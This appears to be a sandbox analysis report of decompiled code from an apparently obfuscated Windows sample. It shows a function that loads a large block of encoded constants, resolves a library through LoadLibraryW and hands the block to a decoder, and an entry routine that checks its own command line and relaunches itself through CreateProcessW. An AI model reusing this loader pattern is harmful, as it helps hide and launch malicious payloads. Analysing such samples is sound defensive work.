				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				char _v1428;
				struct HINSTANCE__* _t359;

				_v1428 = 0x35afd9ed;
				_v1424 = 0xb2bb3fd1;
				_v1420 = 0xc54e001f;
				_v1416 = 0x464bd289;
				_v1412 = 0xa62e3cd5;
				_v1408 = 0x10828f30;
				_v1404 = 0xd759c3e6;
				_v1400 = 0x3226a1eb;
				_v1396 = 0x93d3719f;
				_v1392 = 0xff1d7368;
				_v1388 = 0x4cf80263;
				_v1384 = 0x1220b21a;
				_v1380 = 0x9e299973;
				_v1376 = 0x8c93726d;
				_v1372 = 0x388d0cca;
				_v1368 = 0x63dd4a40;
				_v1364 = 0x63312a98;
				_v1360 = 0xc54ade8b;
				_v1356 = 0x57b31f78;
				_v1352 = 0xbaef0446;
				_v1348 = 0xa5fb8b92;
				_v1344 = 0x7ac55a38;
				_v1340 = 0xa13c21f;
				_v1336 = 0x77bc5b0d;
				_v1332 = 0x6b48a641;
				_v1328 = 0xc939f5fe;
				_v1324 = 0xf80f5b16;
				_v1320 = 0xc75ec705;
				_v1316 = 0xdba5663;
				_v1312 = 0x4213a67f;
				_v1308 = 0x3de4493c;
				_v1304 = 0xd6231f80;
				_v1300 = 0x68067b7;
				_v1296 = 0xc082ec40;
				_v1292 = 0xa5d2a512;
				_v1288 = 0x5f226fcb;
				_v1284 = 0x9a62d466;
				_v1280 = 0x2dcc9250;
				_v1276 = 0x68432153;
				_v1272 = 0xe57fc7e;
				_v1268 = 0xf9c65141;
				_v1264 = 0x74e9465;
				_v1260 = 0xa6dac4aa;
				_v1256 = 0x35a3c1f;
				_v1252 = 0xa3662753;
				_v1248 = 0xf78554cb;
				_v1244 = 0xa9ba3f97;
				_v1240 = 0xa7034e35;
				_v1236 = 0xfefc68e9;
				_v1232 = 0xf512b31a;
				_v1228 = 0x7483c20;
				_v1224 = 0x36b5f632;
				_v1220 = 0x38c31e64;
				_v1216 = 0x4c62f726;
				_v1212 = 0x99ba6132;
				_v1208 = 0x323bd5bb;
				_v1204 = 0xd06b8129;
				_v1200 = 0x58ac925d;
				_v1196 = 0x14258239;
				_v1192 = 0x74c7fcd7;
				_v1188 = 0x5b658ef1;
				_v1184 = 0xfef3ed92;
				_v1180 = 0xd6897bdd;
				_v1176 = 0xe3ae805d;
				_v1172 = 0xd7dd3c6a;
				_v1168 = 0xcf62f53e;
				_v1164 = 0x10086fbc;
				_v1160 = 0xb950e66;
				_v1156 = 0x1f978099;
				_v1152 = 0xa5187c45;
				_v1148 = 0xe4f386b;
				_v1144 = 0xa997fe6d;
				_v1140 = 0x39d08a92;
				_v1136 = 0xfb10c42f;
				_v1132 = 0x58d93c66;
				_v1128 = 0x4cf30038;
				_v1124 = 0xa31aa9f3;
				_v1120 = 0xa932cf52;
				_v1116 = 0x2451a583;
				_v1112 = 0xeb831842;
				_v1108 = 0x59b79230;
				_v1104 = 0x47744230;
				_v1100 = 0xd450fcea;
				_v1096 = 0x1959a718;
				_v1092 = 0x6585da84;
				_v1088 = 0xf7b8a766;
				_v1084 = 0xa8e739d6;
				_v1080 = 0x25491a58;
				_v1076 = 0x41855178;
				_v1072 = 0xae9aad57;
				_v1068 = 0x913a6b1b;
				_v1064 = 0xf5bfdaf1;
				_v1060 = 0xe0413efd;
				_v1056 = 0x2a6692be;
				_v1052 = 0xae364f54;
				_v1048 = 0xa4910d06;
				_v1044 = 0xac37d2e2;
				_v1040 = 0x1f0ed562;
				_v1036 = 0xf8313c8;
				_v1032 = 0x1696917a;
				_v1028 = 0x4ba4c9c6;
				_v1024 = 0xca70992d;
				_v1020 = 0x88f129d4;
				_v1016 = 0x8986dfc9;
				_v1012 = 0x8077495d;
				_v1008 = 0x7f188a07;
				_v1004 = 0x7068997b;
				_v1000 = 0x5f73f18e;
				_v996 = 0x7079116d;
				_v992 = 0xf12893f0;
				_v988 = 0x2e1e137f;
				_v984 = 0x9c8a1308;
				_v980 = 0x63f7f786;
				_v976 = 0x82df7bd;
				_v972 = 0xb3225a87;
				_v968 = 0xd1bde73d;
				_v964 = 0x59885592;
				_v960 = 0xc427fd32;
				_v956 = 0x9d169c5c;
				_v952 = 0x6e01ebf2;
				_v948 = 0x9c5f68a9;
				_v944 = 0x559de137;
				_v940 = 0x45953cbd;
				_v936 = 0xd84853c;
				_v932 = 0x65edd287;
				_v928 = 0xef673b85;
				_v924 = 0x7fa3edf8;
				_v920 = 0x83ba664c;
				_v916 = 0xac287487;
				_v912 = 0x4d8c6e16;
				_v908 = 0xd6774e7a;
				_v904 = 0x6a742a14;
				_v900 = 0x7b41d554;
				_v896 = 0x3583a68f;
				_v892 = 0xb64620eb;
				_v888 = 0x968e295c;
				_v884 = 0x1f2a9f33;
				_v880 = 0x20c95888;
				_v876 = 0x3ad04588;
				_v872 = 0x1f3f3349;
				_v868 = 0x8bc63238;
				_v864 = 0x72dfdb8b;
				_v860 = 0x3c084d40;
				_v856 = 0xa03b21f2;
				_v852 = 0x975b711;
				_v848 = 0x66143377;
				_v844 = 0xb0ef4486;
				_v840 = 0x9536b870;
				_v836 = 0xad0c8488;
				_v832 = 0xfa93b301;
				_v828 = 0x625273d4;
				_v824 = 0x2130da0b;
				_v820 = 0x21682fc7;
				_v816 = 0x125bacd0;
				_v812 = 0x8d655941;
				_v808 = 0x7ea7e90a;
				_v804 = 0x998bb919;
				_v800 = 0x4a680a7;
				_v796 = 0x4dc5c9aa;
				_v792 = 0x6f4d8b33;
				_v788 = 0xfff2694d;
				_v784 = 0x7ad03f4c;
				_v780 = 0xec728f7e;
				_v776 = 0xbd5f0efc;
				_v772 = 0x39972492;
				_v768 = 0x8a22d400;
				_v764 = 0xc9e812c9;
				_v760 = 0xd9c8e7;
				_v756 = 0x783a029e;
				_v752 = 0xf55a1b2b;
				_v748 = 0x39a441d8;
				_v744 = 0xfddcd3b7;
				_v740 = 0xa8d3ee78;
				_v736 = 0xb71d00d8;
				_v732 = 0xd8f1a5e0;
				_v728 = 0x171f9db;
				_v724 = 0x608a96cb;
				_v720 = 0x5db98275;
				_v716 = 0x8e64ca5b;
				_v712 = 0x8224c5bb;
				_v708 = 0xf3e18a45;
				_v704 = 0x9fa69ab2;
				_v700 = 0x9858a1cb;
				_v696 = 0x20254080;
				_v692 = 0xc5a28d75;
				_v688 = 0xa7e533b4;
				_v684 = 0xb3f2eb4f;
				_v680 = 0xf3eab420;
				_v676 = 0xe26b573a;
				_v672 = 0x36939b06;
				_v668 = 0xce10ed67;
				_v664 = 0xaa9683c0;
				_v660 = 0x62293a60;
				_v656 = 0x1d84933a;
				_v652 = 0xad1d5e99;
				_v648 = 0x85c61e4e;
				_v644 = 0x5b995538;
				_v640 = 0x8d8b2cb;
				_v636 = 0xa9e61fda;
				_v632 = 0x9cd95a2d;
				_v628 = 0x8a651418;
				_v624 = 0x98b050c0;
				_v620 = 0x40e286e5;
				_v616 = 0x1619f260;
				_v612 = 0xb4bdd31f;
				_v608 = 0xb99d071c;
				_v604 = 0x125c63d2;
				_v600 = 0x2b37c664;
				_v596 = 0x82586a06;
				_v592 = 0x68bb79f8;
				_v588 = 0xde917f5e;
				_v584 = 0x13cb2094;
				_v580 = 0x4e37c720;
				_v576 = 0x6a7f746d;
				_v572 = 0xd082913f;
				_v568 = 0xbf74de13;
				_v564 = 0xa80f39b0;
				_v560 = 0xd992575e;
				_v556 = 0x68739177;
				_v552 = 0x3f37384b;
				_v548 = 0x18bc988d;
				_v544 = 0x46cd9d63;
				_v540 = 0xf4719ae3;
				_v536 = 0xf64f55e0;
				_v532 = 0x87d9f1a7;
				_v528 = 0x8f398c60;
				_v524 = 0x8cb94234;
				_v520 = 0xbbea7dd7;
				_v516 = 0xb9b8b1df;
				_v512 = 0xaa28a9fc;
				_v508 = 0xf0af87ff;
				_v504 = 0x8dd7ca67;
				_v500 = 0xe2b550c4;
				_v496 = 0xd32bc033;
				_v492 = 0x948a965f;
				_v488 = 0x8851f930;
				_v484 = 0x8f5ccc1;
				_v480 = 0x6164f669;
				_v476 = 0x33510924;
				_v472 = 0xcb43e698;
				_v468 = 0x6ce52a33;
				_v464 = 0xa66f015c;
				_v460 = 0x7718680d;
				_v456 = 0x9d1df3bc;
				_v452 = 0x2a00c920;
				_v448 = 0x91fb3000;
				_v444 = 0x10c81bc3;
				_v440 = 0xf8a75bf2;
				_v436 = 0x5ae0234a;
				_v432 = 0xf98cf7ec;
				_v428 = 0x5fc46df;
				_v424 = 0xca1b041b;
				_v420 = 0x2790b2c6;
				_v416 = 0x54daa301;
				_v412 = 0x138923a3;
				_v408 = 0x301c0cdf;
				_v404 = 0x38e0a856;
				_v400 = 0xf03451b0;
				_v396 = 0x99e431f5;
				_v392 = 0x11281ac6;
				_v388 = 0xcf2342ab;
				_v384 = 0x9eab3b39;
				_v380 = 0x9ae3e3f1;
				_v376 = 0x1a6c98f3;
				_v372 = 0x68813b1b;
				_v368 = 0x192d795a;
				_v364 = 0x40d247a5;
				_v360 = 0x72cd97b3;
				_v356 = 0x67b5cebb;
				_v352 = 0x72e3ccbf;
				_v348 = 0x6f4c2d5b;
				_v344 = 0x9e6a8356;
				_v340 = 0x49e92bba;
				_v336 = 0x4f743d77;
				_v332 = 0x153393e1;
				_v328 = 0x13614add;
				_v324 = 0x69ce03ee;
				_v320 = 0x854a7485;
				_v316 = 0x3d8d4e01;
				_v312 = 0x326ab68;
				_v308 = 0x1099a027;
				_v304 = 0xf0ad3f63;
				_v300 = 0xef67c339;
				_v296 = 0x48f2e773;
				_v292 = 0x20c73ca2;
				_v288 = 0x3ce286cb;
				_v284 = 0xc256b288;
				_v280 = 0x5313123f;
				_v276 = 0x298713bc;
				_v272 = 0xa00fff1e;
				_v268 = 0x712c154;
				_v264 = 0x8dfdabca;
				_v260 = 0x1b118de3;
				_v256 = 0x41128fd1;
				_v252 = 0x6de2b7e3;
				_v248 = 0x5024cd33;
				_v244 = 0x6abdc573;
				_v240 = 0x1c49177e;
				_v236 = 0x21386a4d;
				_v232 = 0x93f5651f;
				_v228 = 0xc73e8d48;
				_v224 = 0x3cac36f9;
				_v220 = 0x2d121512;
				_v216 = 0xa1b212f1;
				_v212 = 0x9129c71a;
				_v208 = 0x4db0cfdf;
				_v204 = 0xd654f2c6;
				_v200 = 0x16901ffd;
				_v196 = 0x81f89533;
				_v192 = 0x1b05c4c7;
				_v188 = 0x5eca920e;
				_v184 = 0x7724293;
				_v180 = 0x500c8610;
				_v176 = 0x55e5490d;
				_v172 = 0x62084e15;
				_v168 = 0xcf1eef0a;
				_v164 = 0xc774a676;
				_v160 = 0xae26a56e;
				_v156 = 0xcd297ae8;
				_v152 = 0x4142669a;
				_v148 = 0x7a1cc234;
				_v144 = 0x9b8e60b1;
				_v140 = 0xb4c16bb9;
				_v136 = 0x346d9962;
				_v132 = 0x84307aeb;
				_v128 = 0x7110f065;
				_v124 = 0x6a478088;
				_v120 = 0x5dc95d88;
				_v116 = 0x7073454d;
				_v112 = 0xacd929e4;
				_v108 = 0xde22b221;
				_v104 = 0x16e6327;
				_v100 = 0x9149dc8;
				_v96 = 0xe2880d33;
				_v92 = 0x2b179b1c;
				_v88 = 0xdea65404;
				_v84 = 0xf8875bcd;
				_v80 = 0x4b33baa9;
				_v76 = 0xb8f51a63;
				_v72 = 0x100f3977;
				_v68 = 0x86e5080f;
				_v64 = 0x39c92f99;
				_v60 = 0xd5b96d4e;
				_v56 = 0x4c99974;
				_v52 = 0x32225531;
				_v48 = 0xe94abe7a;
				_v44 = 0x45a4729;
				_v40 = 0xe5478378;
				_v36 = 0x67de8f40;
				_v32 = 0x9ef8aa84;
				_v28 = 0xb07d4bc5;
				_v24 = 0xa2696d4;
				_v20 = 0x57bd9265;
				_v16 = 0x5cb55045;
				_v12 = 0x686aeb99;
				_v8 = 0xd8fb779c;
				_t367 = E00401A52(0x412830, 0x72fc3a35);
				_t359 = LoadLibraryW(_t358); // executed
				 *0x416500 = _t359;
				L00401B09(_t367);
				_push(0x415f50);
				_push(0x15bf801c);
				return E004012FF( *0x416500,  &_v1428, 0x164);
			}








































































































































































































































































































































































                  0x0040b6bf
                  0x0040b6c9
                  0x0040b6d3
                  0x0040b6dd
                  0x0040b6e7
                  0x0040b6f1
                  0x0040b6fb
                  0x0040b705
                  0x0040b70f
                  0x0040b719
                  0x0040b723
                  0x0040b72d
                  0x0040b737
                  0x0040b741
                  0x0040b74b
                  0x0040b755
                  0x0040b75f
                  0x0040b769
                  0x0040b773
                  0x0040b77d
                  0x0040b787
                  0x0040b791
                  0x0040b79b
                  0x0040b7a5
                  0x0040b7af
                  0x0040b7b9
                  0x0040b7c3
                  0x0040b7cd
                  0x0040b7d7
                  0x0040b7e1
                  0x0040b7eb
                  0x0040b7f5
                  0x0040b7ff
                  0x0040b809
                  0x0040b813
                  0x0040b81d
                  0x0040b827
                  0x0040b831
                  0x0040b83b
                  0x0040b845
                  0x0040b84f
                  0x0040b859
                  0x0040b863
                  0x0040b86d
                  0x0040b877
                  0x0040b881
                  0x0040b88b
                  0x0040b895
                  0x0040b89f
                  0x0040b8a9
                  0x0040b8b3
                  0x0040b8bd
                  0x0040b8c7
                  0x0040b8d1
                  0x0040b8db
                  0x0040b8e5
                  0x0040b8ef
                  0x0040b8f9
                  0x0040b903
                  0x0040b90d
                  0x0040b917
                  0x0040b921
                  0x0040b92b
                  0x0040b935
                  0x0040b93f
                  0x0040b949
                  0x0040b953
                  0x0040b95d
                  0x0040b967
                  0x0040b971
                  0x0040b97b
                  0x0040b985
                  0x0040b98f
                  0x0040b999
                  0x0040b9a3
                  0x0040b9ad
                  0x0040b9b7
                  0x0040b9c1
                  0x0040b9cb
                  0x0040b9d5
                  0x0040b9df
                  0x0040b9e9
                  0x0040b9f3
                  0x0040b9fd
                  0x0040ba07
                  0x0040ba11
                  0x0040ba1b
                  0x0040ba25
                  0x0040ba2f
                  0x0040ba39
                  0x0040ba43
                  0x0040ba4d
                  0x0040ba57
                  0x0040ba61
                  0x0040ba6b
                  0x0040ba75
                  0x0040ba7f
                  0x0040ba89
                  0x0040ba93
                  0x0040ba9d
                  0x0040baa7
                  0x0040bab1
                  0x0040babb
                  0x0040bac5
                  0x0040bacf
                  0x0040bad9
                  0x0040bae3
                  0x0040baed
                  0x0040baf7
                  0x0040bb01
                  0x0040bb0b
                  0x0040bb15
                  0x0040bb1f
                  0x0040bb29
                  0x0040bb33
                  0x0040bb3d
                  0x0040bb47
                  0x0040bb51
                  0x0040bb5b
                  0x0040bb65
                  0x0040bb6f
                  0x0040bb79
                  0x0040bb83
                  0x0040bb8d
                  0x0040bb97
                  0x0040bba1
                  0x0040bbab
                  0x0040bbb5
                  0x0040bbbf
                  0x0040bbc9
                  0x0040bbd3
                  0x0040bbdd
                  0x0040bbe7
                  0x0040bbf1
                  0x0040bbfb
                  0x0040bc05
                  0x0040bc0f
                  0x0040bc19
                  0x0040bc23
                  0x0040bc2d
                  0x0040bc37
                  0x0040bc41
                  0x0040bc4b
                  0x0040bc55
                  0x0040bc5f
                  0x0040bc69
                  0x0040bc73
                  0x0040bc7d
                  0x0040bc87
                  0x0040bc91
                  0x0040bc9b
                  0x0040bca5
                  0x0040bcaf
                  0x0040bcb9
                  0x0040bcc3
                  0x0040bccd
                  0x0040bcd7
                  0x0040bce1
                  0x0040bceb
                  0x0040bcf5
                  0x0040bcff
                  0x0040bd09
                  0x0040bd13
                  0x0040bd1d
                  0x0040bd27
                  0x0040bd31
                  0x0040bd3b
                  0x0040bd45
                  0x0040bd4f
                  0x0040bd59
                  0x0040bd63
                  0x0040bd6d
                  0x0040bd77
                  0x0040bd81
                  0x0040bd8b
                  0x0040bd95
                  0x0040bd9f
                  0x0040bda9
                  0x0040bdb3
                  0x0040bdbd
                  0x0040bdc7
                  0x0040bdd1
                  0x0040bddb
                  0x0040bde5
                  0x0040bdef
                  0x0040bdf9
                  0x0040be03
                  0x0040be0d
                  0x0040be17
                  0x0040be21
                  0x0040be2b
                  0x0040be35
                  0x0040be3f
                  0x0040be49
                  0x0040be53
                  0x0040be5d
                  0x0040be67
                  0x0040be71
                  0x0040be7b
                  0x0040be85
                  0x0040be8f
                  0x0040be99
                  0x0040bea3
                  0x0040bead
                  0x0040beb7
                  0x0040bec1
                  0x0040becb
                  0x0040bed5
                  0x0040bedf
                  0x0040bee9
                  0x0040bef3
                  0x0040befd
                  0x0040bf07
                  0x0040bf11
                  0x0040bf1b
                  0x0040bf25
                  0x0040bf2f
                  0x0040bf39
                  0x0040bf43
                  0x0040bf4d
                  0x0040bf57
                  0x0040bf61
                  0x0040bf6b
                  0x0040bf75
                  0x0040bf7f
                  0x0040bf89
                  0x0040bf93
                  0x0040bf9d
                  0x0040bfa7
                  0x0040bfb1
                  0x0040bfbb
                  0x0040bfc5
                  0x0040bfcf
                  0x0040bfd9
                  0x0040bfe3
                  0x0040bfed
                  0x0040bff7
                  0x0040c001
                  0x0040c00b
                  0x0040c015
                  0x0040c01f
                  0x0040c029
                  0x0040c033
                  0x0040c03d
                  0x0040c047
                  0x0040c051
                  0x0040c05b
                  0x0040c065
                  0x0040c06f
                  0x0040c079
                  0x0040c083
                  0x0040c08d
                  0x0040c097
                  0x0040c0a1
                  0x0040c0ab
                  0x0040c0b5
                  0x0040c0bf
                  0x0040c0c9
                  0x0040c0d3
                  0x0040c0dd
                  0x0040c0e7
                  0x0040c0f1
                  0x0040c0fb
                  0x0040c105
                  0x0040c10f
                  0x0040c119
                  0x0040c123
                  0x0040c12d
                  0x0040c137
                  0x0040c141
                  0x0040c14b
                  0x0040c155
                  0x0040c15f
                  0x0040c169
                  0x0040c173
                  0x0040c17d
                  0x0040c187
                  0x0040c191
                  0x0040c19b
                  0x0040c1a5
                  0x0040c1af
                  0x0040c1b9
                  0x0040c1c3
                  0x0040c1cd
                  0x0040c1d7
                  0x0040c1e1
                  0x0040c1eb
                  0x0040c1f5
                  0x0040c1ff
                  0x0040c209
                  0x0040c213
                  0x0040c21d
                  0x0040c227
                  0x0040c231
                  0x0040c23b
                  0x0040c245
                  0x0040c24f
                  0x0040c259
                  0x0040c263
                  0x0040c26d
                  0x0040c277
                  0x0040c281
                  0x0040c28b
                  0x0040c295
                  0x0040c29f
                  0x0040c2a9
                  0x0040c2b3
                  0x0040c2bd
                  0x0040c2c7
                  0x0040c2d1
                  0x0040c2db
                  0x0040c2e5
                  0x0040c2ef
                  0x0040c2f9
                  0x0040c303
                  0x0040c30d
                  0x0040c317
                  0x0040c321
                  0x0040c32b
                  0x0040c335
                  0x0040c33f
                  0x0040c349
                  0x0040c353
                  0x0040c362
                  0x0040c371
                  0x0040c378
                  0x0040c37f
                  0x0040c386
                  0x0040c38d
                  0x0040c394
                  0x0040c39b
                  0x0040c3a2
                  0x0040c3a9
                  0x0040c3b0
                  0x0040c3b7
                  0x0040c3be
                  0x0040c3c5
                  0x0040c3cc
                  0x0040c3d3
                  0x0040c3da
                  0x0040c3e1
                  0x0040c3e8
                  0x0040c3ef
                  0x0040c3f6
                  0x0040c3fd
                  0x0040c404
                  0x0040c40b
                  0x0040c412
                  0x0040c419
                  0x0040c420
                  0x0040c427
                  0x0040c42e
                  0x0040c435
                  0x0040c43c
                  0x0040c443
                  0x0040c44a
                  0x0040c456
                  0x0040c459
                  0x0040c461
                  0x0040c466
                  0x0040c477
                  0x0040c47c
                  0x0040c492

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F072, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63stringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			_entry_() {
				char _v20;
				short _v540;
				short _v1060;
				void* _t15;
				int _t21;
				WCHAR* _t25;
				void* _t38;
				WCHAR* _t39;
				WCHAR* _t43;

				E0040CACE();
				E0040DB84();
				GetModuleFileNameW(0,  &_v1060, 0x104);
				_t15 = E00401144( &_v1060);
				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
				 *0x4143a4( &_v540, 0x104, _t38, _t15);
				_t32 = _t38;
				L00401B09(_t38);
				_t39 = GetCommandLineW();
				_t21 = lstrlenW(_t39);
				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
				while(_t39 <= _t43) {
					_t25 = lstrcmpiW(_t39,  &_v540); // executed
					__eflags = _t25;
					if(__eflags != 0) {
						_t39 =  &(_t39[1]);
						__eflags = _t39;
						continue;
					}
					E0040C84E(0x104, _t32, _t39, __eflags); // executed
					ExitProcess(0);
				}
				E00401CC2( &_v1060,  &_v540, _t32,  &_v20);
				ExitProcess(0);
			}












                  0x0040f07e
                  0x0040f083
                  0x0040f097
                  0x0040f0a3
                  0x0040f0b9
                  0x0040f0c5
                  0x0040f0ce
                  0x0040f0d0
                  0x0040f0db
                  0x0040f0de
                  0x0040f0f5
                  0x0040f11c
                  0x0040f102
                  0x0040f108
                  0x0040f10a
                  0x0040f119
                  0x0040f119
                  0x00000000
                  0x0040f119
                  0x0040f10c
                  0x0040f113
                  0x0040f113
                  0x0040f131
                  0x0040f13a

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
